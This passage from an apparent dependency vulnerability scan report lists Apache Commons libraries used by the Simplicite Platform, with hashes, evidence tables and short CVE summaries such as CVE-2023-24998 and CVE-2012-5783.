20210802 [GitHub] [skywalking] wu-sheng opened a new pull request #7400: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090 - [skywalking-notifications] 20210802 [skywalking] 01/01: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090 - [skywalking-notifications] 20210803 [GitHub] [skywalking] codecov[bot] edited a comment on pull request #7400: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090 - [skywalking-notifications] 20210803 [GitHub] [skywalking] hanahmily merged pull request #7400: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090 - [skywalking-notifications] 20210803 [skywalking] branch master updated: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090 (#7400) - [tomcat-dev] 20210811 [GitHub] [tomcat-jakartaee-migration] ebourg commented on issue #23: Vulnerability with Apache Commons Compress v1.20 CONFIRM - https://security.netapp.com/advisory/ntap-20211022-0001/ MISC - https://commons.apache.org/proper/commons-compress/security-reports.html MISC - https://lists.apache.org/thread.html/rc4134026d7d7b053d4f9f2205531122732405012c8804fd850a9b26f%40%3Cuser.commons.apache.org%3E MISC - https://www.oracle.com/security-alerts/cpuapr2022.html MISC - https://www.oracle.com/security-alerts/cpujan2022.html MISC - https://www.oracle.com/security-alerts/cpuoct2021.html MLIST - [oss-security] 20210713 CVE-2021-36090: Apache Commons Compress 1.0 to 1.20 denial of service vulnerability MLIST - [oss-security] 20210713 CVE-2021-36374: Apache Ant ZIP, and ZIP based, archive denial of service vulerability N/A - N/A OSSINDEX - [CVE-2021-36090] CWE-130: Improper Handling of Length Parameter Inconsistency OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-36090 OSSIndex - https://commons.apache.org/proper/commons-compress/security-reports.html OSSIndex - https://github.com/OpenLiberty/open-liberty/issues/18808 OSSIndex - https://github.com/OpenLiberty/open-liberty/pull/17872 OSSIndex - https://lists.apache.org/thread.html/r0e87177f8e78b4ee453cd4d3d8f4ddec6f10d2c27707dd71e12cafc9@%3Cannounce.apache.org%3E OSSIndex - https://openliberty.io/docs/latest/security-vulnerabilities.html Vulnerable Software & Versions: (show all )
commons-csv-1.7.jarDescription:
The Apache Commons CSV library provides a simple interface for reading and writing
CSV files of various types.
License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/commons/commons-csv/1.7/commons-csv-1.7.jar
MD5: 2565c6a73ddefd0ceb9e130063f9e51e
SHA1: cb5d05520f8fe1b409aaf29962e47dc5764f8f39
SHA256: 25f5e7914729a3cb9cbb83918b5f1116625cca63ce38a50f0fe596f837b9a524
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name commons-csv High Vendor jar package name apache Highest Vendor jar package name commons Highest Vendor jar package name csv Highest Vendor Manifest bundle-docurl http://commons.apache.org/proper/commons-csv/ Low Vendor Manifest bundle-symbolicname org.apache.commons.commons-csv Medium Vendor Manifest implementation-build release@ra227a1e2fb61ff5f192cfd8099e7e6f4848d7d43; 2019-06-02 00:13:43+0000 Low Vendor Manifest implementation-url http://commons.apache.org/proper/commons-csv/ Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid commons-csv Highest Vendor pom artifactid commons-csv Low Vendor pom developer email bayard@apache.org Low Vendor pom developer email britter@apache.org Low Vendor pom developer email chtompki@apache.org Low Vendor pom developer email ebourg@apache.org Low Vendor pom developer email ggregory@apache.org Low Vendor pom developer email mvdb@apache.org Low Vendor pom developer email yonik@apache.org Low Vendor pom developer id bayard Medium Vendor pom developer id britter Medium Vendor pom developer id chtompki Medium Vendor pom developer id ebourg Medium Vendor pom developer id ggregory Medium Vendor pom developer id mvdb Medium Vendor pom developer id yonik Medium Vendor pom developer name Benedikt Ritter Medium Vendor pom developer name Emmanuel Bourg Medium Vendor pom developer name Gary Gregory Medium Vendor pom developer name Henri Yandell Medium Vendor pom developer name Martin van den Bemt Medium Vendor pom developer name Rob Tompkins Medium Vendor pom developer name Yonik Seeley Medium Vendor pom developer org Apache Medium Vendor pom developer org The Apache Software Foundation Medium Vendor pom groupid org.apache.commons Highest Vendor pom name Apache Commons CSV High Vendor pom parent-artifactid commons-parent Low Vendor pom url http://commons.apache.org/proper/commons-csv/ Highest Product file name commons-csv High Product jar package name apache Highest Product jar package name commons Highest Product jar package name csv Highest Product Manifest bundle-docurl http://commons.apache.org/proper/commons-csv/ Low Product Manifest Bundle-Name Apache Commons CSV Medium Product Manifest bundle-symbolicname org.apache.commons.commons-csv Medium Product Manifest implementation-build release@ra227a1e2fb61ff5f192cfd8099e7e6f4848d7d43; 2019-06-02 00:13:43+0000 Low Product Manifest Implementation-Title Apache Commons CSV High Product Manifest implementation-url http://commons.apache.org/proper/commons-csv/ Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Product Manifest specification-title Apache Commons CSV Medium Product pom artifactid commons-csv Highest Product pom developer email bayard@apache.org Low Product pom developer email britter@apache.org Low Product pom developer email chtompki@apache.org Low Product pom developer email ebourg@apache.org Low Product pom developer email ggregory@apache.org Low Product pom developer email mvdb@apache.org Low Product pom developer email yonik@apache.org Low Product pom developer id bayard Low Product pom developer id britter Low Product pom developer id chtompki Low Product pom developer id ebourg Low Product pom developer id ggregory Low Product pom developer id mvdb Low Product pom developer id yonik Low Product pom developer name Benedikt Ritter Low Product pom developer name Emmanuel Bourg Low Product pom developer name Gary Gregory Low Product pom developer name Henri Yandell Low Product pom developer name Martin van den Bemt Low Product pom developer name Rob Tompkins Low Product pom developer name Yonik Seeley Low Product pom developer org Apache Low Product pom developer org The Apache Software Foundation Low Product pom groupid org.apache.commons Highest Product pom name Apache Commons CSV High Product pom parent-artifactid commons-parent Medium Product pom url http://commons.apache.org/proper/commons-csv/ Medium Version file version 1.7 High Version Manifest Implementation-Version 1.7 High Version pom parent-version 1.7 Low Version pom version 1.7 Highest
commons-discovery-0.5.jarDescription:
The Apache Commons Discovery component is about discovering, or finding,
implementations for pluggable interfaces. License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/commons-discovery/commons-discovery/0.5/commons-discovery-0.5.jar
MD5: b35120680c3a22cec7a037fce196cd97
SHA1: 3a8ac816bbe02d2f88523ef22cbf2c4abd71d6a8
SHA256: e5b7d58ae62e5b309d5c0ffa5a5b1d9d1e0f0c4c3cc18d1fe3103fd29f90149d
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name commons-discovery High Vendor jar package name apache Highest Vendor jar package name commons Highest Vendor jar package name discovery Highest Vendor Manifest bundle-docurl http://commons.apache.org/discovery/ Low Vendor Manifest bundle-symbolicname org.apache.commons.discovery Medium Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache Medium Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid commons-discovery Highest Vendor pom artifactid commons-discovery Low Vendor pom developer email dims@apache.org Low Vendor pom developer email jstrachan@apache.org Low Vendor pom developer email matth@apache.org Low Vendor pom developer email rdonkin@apache.org Low Vendor pom developer email rwinston@eircom.net Low Vendor pom developer email simonetripodi@apache.org Low Vendor pom developer id costin Medium Vendor pom developer id craigmcc Medium Vendor pom developer id dims Medium Vendor pom developer id jstrachan Medium Vendor pom developer id matth Medium Vendor pom developer id rdonkin Medium Vendor pom developer id rsitze Medium Vendor pom developer id rwinston Medium Vendor pom developer id simonetripodi Medium Vendor pom developer name Costin Manolache Medium Vendor pom developer name Craig R. McClanahan Medium Vendor pom developer name Davanum Srinivas Medium Vendor pom developer name James Strachan Medium Vendor pom developer name Matthew Hawthorne Medium Vendor pom developer name Richard Sitze Medium Vendor pom developer name Robert Burrell Donkin Medium Vendor pom developer name Rory Winston Medium Vendor pom developer name Simone Tripodi Medium Vendor pom developer org SpiritSoft, Inc. Medium Vendor pom groupid commons-discovery Highest Vendor pom name Commons Discovery High Vendor pom parent-artifactid commons-parent Low Vendor pom parent-groupid org.apache.commons Medium Vendor pom url http://commons.apache.org/discovery/ Highest Product file name commons-discovery High Product jar package name apache Highest Product jar package name commons Highest Product jar package name discovery Highest Product Manifest bundle-docurl http://commons.apache.org/discovery/ Low Product Manifest Bundle-Name Commons Discovery Medium Product Manifest bundle-symbolicname org.apache.commons.discovery Medium Product Manifest Implementation-Title Commons Discovery High Product Manifest specification-title Commons Discovery Medium Product pom artifactid commons-discovery Highest Product pom developer email dims@apache.org Low Product pom developer email jstrachan@apache.org Low Product pom developer email matth@apache.org Low Product pom developer email rdonkin@apache.org Low Product pom developer email rwinston@eircom.net Low Product pom developer email simonetripodi@apache.org Low Product pom developer id costin Low Product pom developer id craigmcc Low Product pom developer id dims Low Product pom developer id jstrachan Low Product pom developer id matth Low Product pom developer id rdonkin Low Product pom developer id rsitze Low Product pom developer id rwinston Low Product pom developer id simonetripodi Low Product pom developer name Costin Manolache Low Product pom developer name Craig R. McClanahan Low Product pom developer name Davanum Srinivas Low Product pom developer name James Strachan Low Product pom developer name Matthew Hawthorne Low Product pom developer name Richard Sitze Low Product pom developer name Robert Burrell Donkin Low Product pom developer name Rory Winston Low Product pom developer name Simone Tripodi Low Product pom developer org SpiritSoft, Inc. Low Product pom groupid commons-discovery Highest Product pom name Commons Discovery High Product pom parent-artifactid commons-parent Medium Product pom parent-groupid org.apache.commons Medium Product pom url http://commons.apache.org/discovery/ Medium Version file version 0.5 High Version Manifest Bundle-Version 0.5 High Version Manifest Implementation-Version 0.5 High Version pom parent-version 0.5 Low Version pom version 0.5 Highest
CVE-2022-0869 suppress
Multiple Open Redirect in GitHub repository nitely/spirit prior to 0.12.3. CWE-601 URL Redirection to Untrusted Site ('Open Redirect')
CVSSv2:
Base Score: MEDIUM (5.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:N CVSSv3:
Base Score: MEDIUM (6.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N References:
Vulnerable Software & Versions:
commons-email-1.5.jarDescription:
Apache Commons Email aims to provide an API for sending email. It is built on top of
the JavaMail API, which it aims to simplify.
License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/commons/commons-email/1.5/commons-email-1.5.jar
MD5: e72657496d31f152aa26d4122e0850d9
SHA1: e8e677c6362eba14ff3c476ba63ccb83132dbd52
SHA256: ee8479906abb2c355a46a0a9845cfa1803bcc3c520a34baea4a6cf4e1f0f0cc1
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name commons-email High Vendor jar package name apache Highest Vendor jar package name commons Highest Vendor jar package name email Highest Vendor Manifest bundle-docurl http://commons.apache.org/proper/commons-email/ Low Vendor Manifest bundle-symbolicname org.apache.commons.email Medium Vendor Manifest implementation-build trunk@r1803365; 2017-07-29 15:56:23+0200 Low Vendor Manifest implementation-url http://commons.apache.org/proper/commons-email/ Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid commons-email Highest Vendor pom artifactid commons-email Low Vendor pom developer email bspeakmon@apache.org Low Vendor pom developer email dion@apache.org Low Vendor pom developer email dlr@finemaltcoding.com Low Vendor pom developer email epugh@opensourceconnections.com Low Vendor pom developer email ggregory@apache.org Low Vendor pom developer email hps@intermeta.de Low Vendor pom developer email jason@zenplex.com Low Vendor pom developer email jmcnally@collab.net Low Vendor pom developer email Joe@Germuska.com Low Vendor pom developer email jon@latchkey.com Low Vendor pom developer email quintonm@bellsouth.net Low Vendor pom developer email rdonkin@apache.org Low Vendor pom developer email sgoeschl@apache.org Low Vendor pom developer email tn@apache.org Low Vendor pom developer id bspeakmon Medium Vendor pom developer id dion Medium Vendor pom developer id dlr Medium Vendor pom developer id epugh Medium Vendor pom developer id germuska Medium Vendor pom developer id ggregory Medium Vendor pom developer id henning Medium Vendor pom developer id jmcnally Medium Vendor pom developer id jon Medium Vendor pom developer id jvanzyl Medium Vendor pom developer id quintonm Medium Vendor pom developer id rdonkin Medium Vendor pom developer id scolebourne Medium Vendor pom developer id sgoeschl Medium Vendor pom developer id tn Medium Vendor pom developer name Ben Speakmon Medium Vendor pom developer name Daniel Rall Medium Vendor pom developer name dIon Gillard Medium Vendor pom developer name Eric Pugh Medium Vendor pom developer name Gary Gregory Medium Vendor pom developer name Henning P. Schmiedehausen Medium Vendor pom developer name Jason van Zyl Medium Vendor pom developer name Joe Germuska Medium Vendor pom developer name John McNally Medium Vendor pom developer name Jon Scott Stevens Medium Vendor pom developer name Quinton McCombs Medium Vendor pom developer name Robert Burrell Donkin Medium Vendor pom developer name Siegfried Goeschl Medium Vendor pom developer name Stephen Colebourne Medium Vendor pom developer name Thomas Neidhart Medium Vendor pom developer org CollabNet, Inc. Medium Vendor pom developer org INTERMETA - Gesellschaft fuer Mehrwertdienste mbH Medium Vendor pom developer org NequalsOne, LLC. Medium Vendor pom developer org OpenSource Connections Medium Vendor pom developer org The Apache Software Foundation Medium Vendor pom developer org Zenplex Medium Vendor pom groupid org.apache.commons Highest Vendor pom name Apache Commons Email High Vendor pom parent-artifactid commons-parent Low Vendor pom url http://commons.apache.org/proper/commons-email/ Highest Product file name commons-email High Product jar package name apache Highest Product jar package name commons Highest Product jar package name email Highest Product Manifest bundle-docurl http://commons.apache.org/proper/commons-email/ Low Product Manifest Bundle-Name Apache Commons Email Medium Product Manifest bundle-symbolicname org.apache.commons.email Medium Product Manifest implementation-build trunk@r1803365; 2017-07-29 15:56:23+0200 Low Product Manifest Implementation-Title Apache Commons Email High Product Manifest implementation-url http://commons.apache.org/proper/commons-email/ Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Product Manifest specification-title Apache Commons Email Medium Product pom artifactid commons-email Highest Product pom developer email bspeakmon@apache.org Low Product pom developer email dion@apache.org Low Product pom developer email dlr@finemaltcoding.com Low Product pom developer email epugh@opensourceconnections.com Low Product pom developer email ggregory@apache.org Low Product pom developer email hps@intermeta.de Low Product pom developer email jason@zenplex.com Low Product pom developer email jmcnally@collab.net Low Product pom developer email Joe@Germuska.com Low Product pom developer email jon@latchkey.com Low Product pom developer email quintonm@bellsouth.net Low Product pom developer email rdonkin@apache.org Low Product pom developer email sgoeschl@apache.org Low Product pom developer email tn@apache.org Low Product pom developer id bspeakmon Low Product pom developer id dion Low Product pom developer id dlr Low Product pom developer id epugh Low Product pom developer id germuska Low Product pom developer id ggregory Low Product pom developer id henning Low Product pom developer id jmcnally Low Product pom developer id jon Low Product pom developer id jvanzyl Low Product pom developer id quintonm Low Product pom developer id rdonkin Low Product pom developer id scolebourne Low Product pom developer id sgoeschl Low Product pom developer id tn Low Product pom developer name Ben Speakmon Low Product pom developer name Daniel Rall Low Product pom developer name dIon Gillard Low Product pom developer name Eric Pugh Low Product pom developer name Gary Gregory Low Product pom developer name Henning P. Schmiedehausen Low Product pom developer name Jason van Zyl Low Product pom developer name Joe Germuska Low Product pom developer name John McNally Low Product pom developer name Jon Scott Stevens Low Product pom developer name Quinton McCombs Low Product pom developer name Robert Burrell Donkin Low Product pom developer name Siegfried Goeschl Low Product pom developer name Stephen Colebourne Low Product pom developer name Thomas Neidhart Low Product pom developer org CollabNet, Inc. Low Product pom developer org INTERMETA - Gesellschaft fuer Mehrwertdienste mbH Low Product pom developer org NequalsOne, LLC. Low Product pom developer org OpenSource Connections Low Product pom developer org The Apache Software Foundation Low Product pom developer org Zenplex Low Product pom groupid org.apache.commons Highest Product pom name Apache Commons Email High Product pom parent-artifactid commons-parent Medium Product pom url http://commons.apache.org/proper/commons-email/ Medium Version file version 1.5 High Version Manifest Implementation-Version 1.5 High Version pom parent-version 1.5 Low Version pom version 1.5 Highest
commons-exec-1.3.jarDescription:
Apache Commons Exec is a library to reliably execute external processes from within the JVM. License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/commons/commons-exec/1.3/commons-exec-1.3.jar
MD5: 8bb8fa2edfd60d5c7ed6bf9923d14aa8
SHA1: 8dfb9facd0830a27b1b5f29f84593f0aeee7773b
SHA256: cb49812dc1bfb0ea4f20f398bcae1a88c6406e213e67f7524fb10d4f8ad9347b
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name commons-exec High Vendor jar package name apache Highest Vendor jar package name commons Highest Vendor jar package name exec Highest Vendor Manifest bundle-docurl http://commons.apache.org/proper/commons-exec/ Low Vendor Manifest bundle-symbolicname org.apache.commons.exec Medium Vendor Manifest implementation-build trunk@r1636211; 2014-11-02 23:51:55+0000 Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.5))" Low Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid commons-exec Highest Vendor pom artifactid commons-exec Low Vendor pom developer email ggregory@apache.org Low Vendor pom developer id brett Medium Vendor pom developer id ggregory Medium Vendor pom developer id sebb Medium Vendor pom developer id sgoeschl Medium Vendor pom developer id trygvis Medium Vendor pom developer name Brett Porter Medium Vendor pom developer name Gary Gregory Medium Vendor pom developer name Sebastian Bazley Medium Vendor pom developer name Siegfried Goeschl Medium Vendor pom developer name Trygve Laugstøl Medium Vendor pom developer org Apache Medium Vendor pom groupid org.apache.commons Highest Vendor pom name Apache Commons Exec High Vendor pom parent-artifactid commons-parent Low Vendor pom url http://commons.apache.org/proper/commons-exec/ Highest Product file name commons-exec High Product jar package name apache Highest Product jar package name commons Highest Product jar package name exec Highest Product Manifest bundle-docurl http://commons.apache.org/proper/commons-exec/ Low Product Manifest Bundle-Name Apache Commons Exec Medium Product Manifest bundle-symbolicname org.apache.commons.exec Medium Product Manifest implementation-build trunk@r1636211; 2014-11-02 23:51:55+0000 Low Product Manifest Implementation-Title Apache Commons Exec High Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.5))" Low Product Manifest specification-title Apache Commons Exec Medium Product pom artifactid commons-exec Highest Product pom developer email ggregory@apache.org Low Product pom developer id brett Low Product pom developer id ggregory Low Product pom developer id sebb Low Product pom developer id sgoeschl Low Product pom developer id trygvis Low Product pom developer name Brett Porter Low Product pom developer name Gary Gregory Low Product pom developer name Sebastian Bazley Low Product pom developer name Siegfried Goeschl Low Product pom developer name Trygve Laugstøl Low Product pom developer org Apache Low Product pom groupid org.apache.commons Highest Product pom name Apache Commons Exec High Product pom parent-artifactid commons-parent Medium Product pom url http://commons.apache.org/proper/commons-exec/ Medium Version file version 1.3 High Version Manifest Implementation-Version 1.3 High Version pom parent-version 1.3 Low Version pom version 1.3 Highest
commons-fileupload-1.4.jarDescription:
The Apache Commons FileUpload component provides a simple yet flexible means of adding support for multipart
file upload functionality to servlets and web applications.
License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/commons-fileupload/commons-fileupload/1.4/commons-fileupload-1.4.jar
MD5: 0c3b924dcaaa90c3fb93fe04ae96a35e
SHA1: f95188e3d372e20e7328706c37ef366e5d7859b0
SHA256: a4ec02336f49253ea50405698b79232b8c5cbf02cb60df3a674d77a749a1def7
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name commons-fileupload High Vendor jar package name apache Highest Vendor jar package name commons Highest Vendor jar package name fileupload Highest Vendor Manifest bundle-docurl http://commons.apache.org/proper/commons-fileupload/ Low Vendor Manifest bundle-symbolicname org.apache.commons.commons-fileupload Medium Vendor Manifest implementation-build UNKNOWN@r047f31576411beee69cf75584ae76531cc9ac753; 2018-12-24 07:06:18+0000 Low Vendor Manifest implementation-url http://commons.apache.org/proper/commons-fileupload/ Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid commons-fileupload Highest Vendor pom artifactid commons-fileupload Low Vendor pom developer email chtompki@apache.org Low Vendor pom developer email dion@apache.org Low Vendor pom developer email dlr@finemaltcoding.com Low Vendor pom developer email ggregory@apache.org Low Vendor pom developer email jason@zenplex.com Low Vendor pom developer email jmcnally@collab.net Low Vendor pom developer email jochen.wiedmann@gmail.com Low Vendor pom developer email martinc@apache.org Low Vendor pom developer email rdonkin@apache.org Low Vendor pom developer email sean |at| seansullivan |dot| com Low Vendor pom developer email simonetripodi@apache.org Low Vendor pom developer id chtompki Medium Vendor pom developer id dion Medium Vendor pom developer id dlr Medium Vendor pom developer id ggregory Medium Vendor pom developer id jmcnally Medium Vendor pom developer id jochen Medium Vendor pom developer id jvanzyl Medium Vendor pom developer id martinc Medium Vendor pom developer id rdonkin Medium Vendor pom developer id simonetripodi Medium Vendor pom developer id sullis Medium Vendor pom developer name Daniel Rall Medium Vendor pom developer name dIon Gillard Medium Vendor pom developer name Gary Gregory Medium Vendor pom developer name Jason van Zyl Medium Vendor pom developer name Jochen Wiedmann Medium Vendor pom developer name John McNally Medium Vendor pom developer name Martin Cooper Medium Vendor pom developer name Rob Tompkins Medium Vendor pom developer name Robert Burrell Donkin Medium Vendor pom developer name Sean C. Sullivan Medium Vendor pom developer name Simone Tripodi Medium Vendor pom developer org Adobe Medium Vendor pom developer org CollabNet Medium Vendor pom developer org Multitask Consulting Medium Vendor pom developer org Yahoo! Medium Vendor pom developer org Zenplex Medium Vendor pom groupid commons-fileupload Highest Vendor pom name Apache Commons FileUpload High Vendor pom parent-artifactid commons-parent Low Vendor pom parent-groupid org.apache.commons Medium Vendor pom url http://commons.apache.org/proper/commons-fileupload/ Highest Product file name commons-fileupload High Product jar package name apache Highest Product jar package name commons Highest Product jar package name fileupload Highest Product Manifest bundle-docurl http://commons.apache.org/proper/commons-fileupload/ Low Product Manifest Bundle-Name Apache Commons FileUpload Medium Product Manifest bundle-symbolicname org.apache.commons.commons-fileupload Medium Product Manifest implementation-build UNKNOWN@r047f31576411beee69cf75584ae76531cc9ac753; 2018-12-24 07:06:18+0000 Low Product Manifest Implementation-Title Apache Commons FileUpload High Product Manifest implementation-url http://commons.apache.org/proper/commons-fileupload/ Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Product Manifest specification-title Apache Commons FileUpload Medium Product pom artifactid commons-fileupload Highest Product pom developer email chtompki@apache.org Low Product pom developer email dion@apache.org Low Product pom developer email dlr@finemaltcoding.com Low Product pom developer email ggregory@apache.org Low Product pom developer email jason@zenplex.com Low Product pom developer email jmcnally@collab.net Low Product pom developer email jochen.wiedmann@gmail.com Low Product pom developer email martinc@apache.org Low Product pom developer email rdonkin@apache.org Low Product pom developer email sean |at| seansullivan |dot| com Low Product pom developer email simonetripodi@apache.org Low Product pom developer id chtompki Low Product pom developer id dion Low Product pom developer id dlr Low Product pom developer id ggregory Low Product pom developer id jmcnally Low Product pom developer id jochen Low Product pom developer id jvanzyl Low Product pom developer id martinc Low Product pom developer id rdonkin Low Product pom developer id simonetripodi Low Product pom developer id sullis Low Product pom developer name Daniel Rall Low Product pom developer name dIon Gillard Low Product pom developer name Gary Gregory Low Product pom developer name Jason van Zyl Low Product pom developer name Jochen Wiedmann Low Product pom developer name John McNally Low Product pom developer name Martin Cooper Low Product pom developer name Rob Tompkins Low Product pom developer name Robert Burrell Donkin Low Product pom developer name Sean C. Sullivan Low Product pom developer name Simone Tripodi Low Product pom developer org Adobe Low Product pom developer org CollabNet Low Product pom developer org Multitask Consulting Low Product pom developer org Yahoo! Low Product pom developer org Zenplex Low Product pom groupid commons-fileupload Highest Product pom name Apache Commons FileUpload High Product pom parent-artifactid commons-parent Medium Product pom parent-groupid org.apache.commons Medium Product pom url http://commons.apache.org/proper/commons-fileupload/ Medium Version file version 1.4 High Version Manifest Implementation-Version 1.4 High Version pom parent-version 1.4 Low Version pom version 1.4 Highest
CVE-2023-24998 suppress
Apache Commons FileUpload before 1.5 does not limit the number of request parts to be processed resulting in the possibility of an attacker triggering a DoS with a malicious upload or series of uploads.
Note that, like all of the file upload limits, the
new configuration option (FileUploadBase#setFileCountMax) is not
enabled by default and must be explicitly configured.
CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
commons-httpclient-3.1.jarDescription:
The HttpClient component supports the client-side of RFC 1945 (HTTP/1.0) and RFC 2616 (HTTP/1.1) , several related specifications (RFC 2109 (Cookies) , RFC 2617 (HTTP Authentication) , etc.), and provides a framework by which new request types (methods) or HTTP extensions can be created easily. License:
Apache License: http://www.apache.org/licenses/LICENSE-2.0 File Path: /var/simplicite/.m2/repository/commons-httpclient/commons-httpclient/3.1/commons-httpclient-3.1.jar
MD5: 8ad8c9229ef2d59ab9f59f7050e846a5
SHA1: 964cd74171f427720480efdec40a7c7f6e58426a
SHA256: dbd4953d013e10e7c1cc3701a3e6ccd8c950c892f08d804fabfac21705930443
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name commons-httpclient High Vendor jar package name apache Highest Vendor jar package name commons Highest Vendor jar package name httpclient Highest Vendor jar package name methods Highest Vendor manifest: org/apache/commons/httpclient Implementation-Vendor Apache Software Foundation Medium Vendor pom artifactid commons-httpclient Highest Vendor pom artifactid commons-httpclient Low Vendor pom developer email adrian.sutton -at- ephox.com Low Vendor pom developer email dion -at- apache.org Low Vendor pom developer email jericho -at- apache.org Low Vendor pom developer email jsdever -at- apache.org Low Vendor pom developer email mbecke -at- apache.org Low Vendor pom developer email oglueck -at- apache.org Low Vendor pom developer email olegk -at- apache.org Low Vendor pom developer email rwaldhoff -at- apache Low Vendor pom developer email sullis -at- apache.org Low Vendor pom developer id adrian Medium Vendor pom developer id dion Medium Vendor pom developer id jericho Medium Vendor pom developer id jsdever Medium Vendor pom developer id mbecke Medium Vendor pom developer id oglueck Medium Vendor pom developer id olegk Medium Vendor pom developer id rwaldhoff Medium Vendor pom developer id sullis Medium Vendor pom developer name Adrian Sutton Medium Vendor pom developer name dIon Gillard Medium Vendor pom developer name Jeff Dever Medium Vendor pom developer name Michael Becke Medium Vendor pom developer name Oleg Kalnichevski Medium Vendor pom developer name Ortwin Glueck Medium Vendor pom developer name Rodney Waldhoff Medium Vendor pom developer name Sean C. Sullivan Medium Vendor pom developer name Sung-Gu Medium Vendor pom developer org Britannica Medium Vendor pom developer org Independent consultant Medium Vendor pom developer org Intencha Medium Vendor pom developer org Multitask Consulting Medium Vendor pom groupid commons-httpclient Highest Vendor pom name HttpClient High Vendor pom organization name Apache Software Foundation High Vendor pom organization url http://jakarta.apache.org/ Medium Vendor pom url http://jakarta.apache.org/httpcomponents/httpclient-3.x/ Highest Product file name commons-httpclient High Product jar package name apache Highest Product jar package name commons Highest Product jar package name httpclient Highest Product jar package name methods Highest Product manifest: org/apache/commons/httpclient Implementation-Title org.apache.commons.httpclient Medium Product manifest: org/apache/commons/httpclient Specification-Title Jakarta Commons HttpClient Medium Product pom artifactid commons-httpclient Highest Product pom developer email adrian.sutton -at- ephox.com Low Product pom developer email dion -at- apache.org Low Product pom developer email jericho -at- apache.org Low Product pom developer email jsdever -at- apache.org Low Product pom developer email mbecke -at- apache.org Low Product pom developer email oglueck -at- apache.org Low Product pom developer email olegk -at- apache.org Low Product pom developer email rwaldhoff -at- apache Low Product pom developer email sullis -at- apache.org Low Product pom developer id adrian Low Product pom developer id dion Low Product pom developer id jericho Low Product pom developer id jsdever Low Product pom developer id mbecke Low Product pom developer id oglueck Low Product pom developer id olegk Low Product pom developer id rwaldhoff Low Product pom developer id sullis Low Product pom developer name Adrian Sutton Low Product pom developer name dIon Gillard Low Product pom developer name Jeff Dever Low Product pom developer name Michael Becke Low Product pom developer name Oleg Kalnichevski Low Product pom developer name Ortwin Glueck Low Product pom developer name Rodney Waldhoff Low Product pom developer name Sean C. Sullivan Low Product pom developer name Sung-Gu Low Product pom developer org Britannica Low Product pom developer org Independent consultant Low Product pom developer org Intencha Low Product pom developer org Multitask Consulting Low Product pom groupid commons-httpclient Highest Product pom name HttpClient High Product pom organization name Apache Software Foundation Low Product pom organization url http://jakarta.apache.org/ Low Product pom url http://jakarta.apache.org/httpcomponents/httpclient-3.x/ Medium Version file version 3.1 High Version manifest: org/apache/commons/httpclient Implementation-Version 3.1 Medium Version pom version 3.1 Highest
CVE-2012-5783 suppress
Apache Commons HttpClient 3.x, as used in Amazon Flexible Payments Service (FPS) merchant Java SDK and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate. CWE-295 Improper Certificate Validation
CVSSv2:
Base Score: MEDIUM (5.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:N References:
Vulnerable Software & Versions:
CVE-2020-13956 suppress
